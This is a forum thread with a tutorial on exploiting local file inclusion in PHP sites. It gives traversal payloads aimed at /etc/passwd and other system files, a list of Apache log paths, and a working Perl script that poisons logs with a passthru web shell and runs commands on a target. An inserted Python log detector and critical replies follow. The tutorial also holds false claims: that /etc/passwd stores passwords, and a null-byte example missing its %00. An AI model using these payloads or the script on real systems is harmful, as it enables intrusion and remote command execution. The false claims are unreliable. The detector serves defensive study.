Castiel Posted December 8, 2013

Hi, rst! In this tutorial you will learn how to exploit the LFI vulnerability in a site. First, let's look at this small piece of PHP code:

    <?php
    $page = $_GET['page'];
    include($page);
    ?>

This is code that should never be used; it is vulnerable to LFI because the $page variable is not sanitized. OK, now let's take advantage of this vulnerability using the following code:

    site.host/index.php?page=../../../../../../../etc/passwd

If the site is hosted on Unix, the users' passwords are stored in /etc/passwd, and the code above shows us these passwords and usernames. Now all you have left to do is decode the password. An encrypted password should look something like this:

    username:x:503:100:FullName:/home/username:/bin/sh

In this example the password is x; another example of a password would be:

    username:!:503:100:FullName:/home/username:/bin/sh

Other "places" where you can find passwords besides /etc/passwd would be:

    /etc/group
    /etc/security/group
    /etc/security/passwd
    /etc/security/user
    /etc/security/environ
    /etc/security/limits
    /etc/shadow

In case the browser shows you a .php at the end of the include (and so /etc/passwd.php will no longer exist), append at the end of the include, and the server will skip everything written after it. Example:

    site.host/index.php?file=../../../../../../../../etc/passwd

Now we will try to run commands on the server by injecting PHP code into the logs and then running it. A few log locations:

    ../apache/logs/access.log
    ../../apache/logs/error.log
    ../../apache/logs/access.log
    ../../../apache/logs/error.log
    ../../../apache/logs/access.log
    ../../../../../../../etc/httpd/logs/acces_log
    ../../../../../../../etc/httpd/logs/acces.log
    ../../../../../../../etc/httpd/logs/error_log
    ../../../../../../../etc/httpd/logs/error.log
    ../../../../../../../var/www/logs/access_log
    ../../../../../../../var/www/logs/access.log
    ../../../../../../../usr/local/apache/logs/access_log
    ../../../../../../../usr/local/apache/logs/access.log
    ../../../../../../../var/log/apache/access_log
    ../../../../../../../var/log/apache2/access_log
    ../../../../../../../var/log/apache/access.log
    ../../../../../../../var/log/apache2/access.log
    ../../../../../../../var/log/access_log
    ../../../../../../../var/log/access.log
    ../../../../../../../var/www/logs/error_log
    ../../../../../../../var/www/logs/error.log
    ../../../../../../../usr/local/apache/logs/error_log
    ../../../../../../../usr/local/apache/logs/error.log
    ../../../../../../../var/log/apache/error_log
    ../../../../../../../var/log/apache2/error_log
    ../../../../../../../var/log/apache/error.log
    ../../../../../../../var/log/apache2/error.log
    ../../../../../../../var/log/error_log
    ../../../../../../../var/log/error.log
    ../apache/logs/error.log

OK, now let's take a look at the log in which requests for pages that do not exist are saved, and at the following code: <? passthru($_GET[cmd]) ?>. If we type in the browser:

    site.host/<? passthru($_GET[cmd]) ?>

it will obviously show us a page saying that this code does not exist on the server, because the browser automatically encodes the URL, and the page we accessed is translated by the browser into:

    site.host/<? passthru($_GET[cmd]) ?>

So we will have to do something else... We can use the following Perl script:

    #!/usr/bin/perl -w
    use strict;
    use IO::Socket;

    # target host, the directory holding the vulnerable index.php, the PHP
    # payload to plant in the log, and the log path as seen from the include
    my $site = "victim.com";
    my $path = "/folder/";
    my $code = "<? passthru(\$_GET[cmd]) ?>";
    my $log  = "../../../../../../../etc/httpd/logs/error_log";

    print "Trying to inject the code";
    # request a page that does not exist, with the payload both in the
    # request line and in the User-Agent, so it is written into the log as-is
    my $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $site, PeerPort => "80")
        or die "\nConnection Failed.\n\n";
    print $socket "GET " . $path . $code . " HTTP/1.1\r\n";
    print $socket "User-Agent: " . $code . "\r\n";
    print $socket "Host: " . $site . "\r\n";
    print $socket "Connection: close\r\n\r\n";
    close($socket);
    print "\nCode $code successfully injected in $log \n";

    print "\nType command to run or exit to end: ";
    my $cmd = <STDIN>;
    chomp($cmd);
    while ($cmd ne "exit") {
        # include the poisoned log through the LFI; the command travels in cmd=
        # and is percent-encoded so spaces do not break the request line
        (my $enc = $cmd) =~ s/([^A-Za-z0-9_.~-])/sprintf("%%%02X", ord($1))/ge;
        $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $site, PeerPort => "80")
            or die "\nConnection Failed.\n\n";
        print $socket "GET " . $path . "index.php?page=" . $log . "&cmd=" . $enc . " HTTP/1.1\r\n";
        print $socket "Host: " . $site . "\r\n";
        print $socket "Accept: */*\r\n";
        print $socket "Connection: close\r\n\r\n";
        while (my $show = <$socket>) {
            print $show;
        }
        print "Type command to run or exit to end: ";
        $cmd = <STDIN>;
        chomp($cmd);
    }
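As an added example (not part of the original post, nor of the pro-area tutorial it comes from): a small Python detector that flags, in an Apache combined-format access log, the requests the technique above produces: the traversal to /etc/passwd, the null-byte variant, the poisoning request that carries the PHP tag in both the request line and the User-Agent, and the follow-up include of the log with a cmd= parameter. It goes beyond the post by also catching double-encoded traversal and php:// stream wrappers, which dancezar raises later in the thread. All log lines, IPs and timestamps are constructed for this example.

```python
"""Added example, not part of the original post: a detector for the two LFI
techniques the tutorial describes (traversal toward files such as /etc/passwd,
and log poisoning with PHP tags in the request line or User-Agent), run over
Apache combined-format access-log lines. The sample log is constructed."""
import re
from urllib.parse import unquote

# Apache "combined" LogFormat. The request line is captured whole because a
# poisoned request line has spaces inside the PHP payload.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Files an LFI is usually pointed at (the paths the tutorial lists) and the
# log directories used for poisoning.
SENSITIVE_PREFIXES = (
    "/etc/passwd", "/etc/shadow", "/etc/group", "/etc/security/",
    "/var/log/", "/apache/logs/", "/httpd/logs/", "/var/www/logs/",
)
PHP_TAG = re.compile(r"<\?(?:php\b|=|\s)", re.IGNORECASE)  # <?php, <?=, "<? "
WRAPPER = re.compile(r"\b(?:php|data|expect|phar|zip)://", re.IGNORECASE)


def fully_decode(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so %252e%252e%252f (double encoding) is seen as
    ../ and %00 becomes a real NUL byte."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_line(line: str):
    """Fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    rec = m.groupdict()
    parts = rec["req"].split(" ")
    # method and protocol are the first and last tokens; whatever sits between
    # them is the URI, even when the attacker put spaces into it
    rec["method"] = parts[0]
    rec["proto"] = parts[-1] if len(parts) > 2 else ""
    rec["uri"] = " ".join(parts[1:-1]) if len(parts) > 2 else ""
    return rec


def classify(line: str):
    """Finding tags for one log line: [] when benign, None when unparseable."""
    rec = parse_line(line)
    if rec is None:
        return None
    uri = fully_decode(rec["uri"])
    ua = fully_decode(rec["ua"])
    findings = []
    if "../" in uri or "..\\" in uri:
        findings.append("traversal")
    if any(p in uri for p in SENSITIVE_PREFIXES):
        findings.append("sensitive-file")
    if "\x00" in uri:
        findings.append("null-byte")
    if WRAPPER.search(uri):
        findings.append("stream-wrapper")
    if PHP_TAG.search(uri):
        findings.append("php-tag-in-uri")
    if PHP_TAG.search(ua):
        findings.append("php-tag-in-user-agent")
    # traversal plus a cmd= parameter is the second half of log poisoning:
    # the poisoned log is included and the command runs
    if "traversal" in findings and re.search(r"[?&]cmd=", uri):
        findings.append("lfi-command-param")
    return findings


def scan(lines):
    """Map 1-based line number to findings for every suspicious line."""
    report = {}
    for n, line in enumerate(lines, 1):
        f = classify(line)
        if f:
            report[n] = f
    return report


# Constructed sample log, modelled on the requests the tutorial makes.
SAMPLE_LOG = [
    '10.0.0.5 - - [08/Dec/2013:10:00:01 +0200] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [08/Dec/2013:10:00:07 +0200] "GET /index.php?page=../../../../../../../etc/passwd HTTP/1.1" 200 1830 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [08/Dec/2013:10:00:12 +0200] "GET /index.php?page=..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 1830 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [08/Dec/2013:10:00:20 +0200] "GET /folder/<? passthru($_GET[cmd]) ?> HTTP/1.1" 404 209 "-" "<? passthru($_GET[cmd]) ?>"',
    '10.0.0.9 - - [08/Dec/2013:10:00:25 +0200] "GET /folder/index.php?page=../../../../../../../var/log/apache2/access.log&cmd=id HTTP/1.1" 200 40960 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [08/Dec/2013:10:00:31 +0200] "GET /index.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 3008 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, findings in scan(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(findings)}")
```

Two details matter in practice: the payload is decoded repeatedly before matching, otherwise a double-encoded `..%252f` walks straight past a naive filter, and the request line is taken as one field rather than split on spaces, because the poisoning request itself contains spaces inside the PHP tag and would otherwise never parse.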
SilenTx0 Posted December 8, 2013

Source? Or do you think that if you change one, at most two words, the tutorial is yours? Shame!

dancezar Posted December 8, 2013

Rather sloppily written: "other places where you can find passwords besides /etc/passwd would be:" /etc/passwd has no passwords. Then you forgot to mention the null byte %00 for when the script appends .php at the end. And where are the php://input and php://filter methods?

Castiel Posted December 8, 2013

Did I say it was made by me :))? It is from pro-area, I only fixed some mistakes.

Castiel Posted December 8, 2013

askwrite, did you need a +1? ON: LFI - Local File Inclusion

SilenTx0 Posted December 8, 2013

Since you did not post the source, it is understood that it is made by you :) no need to mention it.

aelius Posted December 8, 2013 (edited December 8, 2013 by aelius)

    If the site is hosted on Unix, the users' passwords are stored in /etc/passwd, and the code above shows us these passwords and usernames.
    Now we will try to run commands on the server by injecting PHP code into the logs and then running it.
    An encrypted password should look something like this: username:x:503:100:FullName:/home/username:/bin/sh

Ouch, mother ...

akkiliON Posted December 8, 2013

    Ouch, mother ...